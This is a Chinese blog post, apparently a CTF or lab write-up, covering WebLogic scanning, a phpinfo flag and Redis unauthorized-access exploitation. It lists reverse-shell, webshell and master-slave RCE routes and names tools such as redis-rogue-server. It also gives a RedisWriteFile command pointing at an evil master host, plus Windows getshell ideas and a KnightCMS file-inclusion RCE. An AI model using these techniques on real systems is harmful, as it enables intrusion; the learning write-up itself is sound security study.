记录一下中途短暂的辉煌时刻
辉煌一刻谁都有,别拿一刻当永久
在昨天初尝战果之后,今天又习惯性的打开
weblogciCVE__
我们看到了对应的端口有
看到熟悉的界面以及之前察觉的端口信息,感觉有可能是weblogic,加上路径console查看一下,是weblogic10.3.6.0
weblogic存在的漏洞太多了,所以我们直接上漏洞扫描工具
看到了漏洞对应的编号,以及存在的回显链路
phpinfo信息泄露
打开界面就是一个phpinfo
尝试了扫路径,查phpinfo漏洞的操作无果后,于是直接在页面上查找关键词flag
轻易就查询到了flag的值,这个题目给5分我是没有想到的
①网安学习成长路径思维导图
②60+网安经典常用工具包
③+SRC漏洞分析报告
④+网安攻防实战技术电子书
⑤最权威CISSP认证考试指南+题库
⑥超页CTF实战技巧手册
⑦最新网安大厂面试题合集(含答案)
⑧APP客户端安全检测指南(安卓+IOS)
Redis未授权访问漏洞
一看对应映射的端口是立马就联想到了Redis,同时这个端口无法从web端进行访问,所以基本可以肯定是Redis了
注意到版本是4.0.14
针对于Redis未授权访问漏洞,有以下利用方法
利用Redis写入webshell
写ssh-keygen公钥登录服务器
利用计划任务反弹shell
利用主从复制获取shell
这里我们选用主从复制漏洞来获取shell
在服务器上操作(今天借到了服务器)
gitclone
利用主从复制获取shell
Redis是一个使用ANSIC编写的开源、支持网络、基于内存、可选持久性的键值对存储数据库。但如果当把数据存储在单个Redis的实例中,当读写体量比较大的时候,服务端就很难承受。为了应对这种情况,Redis就提供了主从模式,主从模式就是指使用一个redis实例作为主机,其他实例都作为备份机,其中主机和从机数据相同,而从机只负责读,主机只负责写,通过读写分离可以大幅度减轻流量的压力,算是一种通过牺牲空间来换取效率的缓解方式。
在Reids4.x之后,Redis新增了模块功能,通过外部拓展,可以实现在Redis中实现一个新的Redis命令,通过写C语言编译并加载恶意的.so文件,达到代码执行的目的。
Linux
在本机上弄的时候出现各种各样的奇葩的问题,给我整破防了,最后我采用了docker来进行复现。复现不同的利用都删掉docker,重启继续进行。最后发现主从复制的利用版本是4.x-5.x,从6.0开始,就无法利用成功,写入exp.so也是可以的,module加载时会失败,提示没有权限,给exp.so权限后时可以的。
sudodockerpullvertigo/redis4sudodockerrun-p:vertigo/redis4
redis-rce
redis-rce
生成恶意.so文件,下载RedisModules-ExecuteCommand使用make编译即可生成
gitclone redis-rogue-server
gitclone
windows
Redis官方没有提供windows版的安装包,windows下使用的Redis还是3.X版本的。redis在写文件的时候会有一些版本信息以及脏数据,无法写出正常的DLL、EXE、LINK等文件,所以对Windows下的redis的利用方法主要是往web目录写马以及写启动项。
RedisWriteFile
RedisWriteFile利用Redis的主从同步写数据,脚本将自己模拟为master,设置对端为slave,master数据空间保证绝对干净,轻松实现了写无损文件。
参考文章对Redis在Windows下的利用方式思考踩坑记录-Redis(Windows)的getshell可以利用以下方式
系统DLL劫持(目标重启或注销)
针对特定软件的DLL劫持(目标一次点击)
覆写目标的快捷方式(目标一次点击)
覆写特定软件的配置文件达到提权目的(目标无需点击或一次点击)
覆写sethc.exe等文件(攻击方一次触发)
mof等
因为对这些暂时还没有研究,所以在这里只演示以下,在windowsredis写无损文件
pythonRedisWriteFile.py--rhost=[target_ip]--rport=[target_redis_port]--lhost=[evil_master_host]--lport=[random]--rpath="[path_to_write]"--rfile="[filename]"--lfile=[filename]python3RedisWriteFile.py--rhost=..10.--rport=--lhost=..10.1--lport=--rpath="C:\Users\Public"--rfile="test.txt"--lfile="test.txt"
哇,这个无损写文件真是yyds,在linux下利用也是没有一点问题。
骑士cms存在模板解析漏洞
打开页面就是骑士cms,想到了骑士cms的历史漏洞文件包含漏洞(thinkphp3的文件包含)
这样操作
漏洞的原理主要是通过将代码通过报错信息写到日志文件中,再利用文件包含实现代码执行。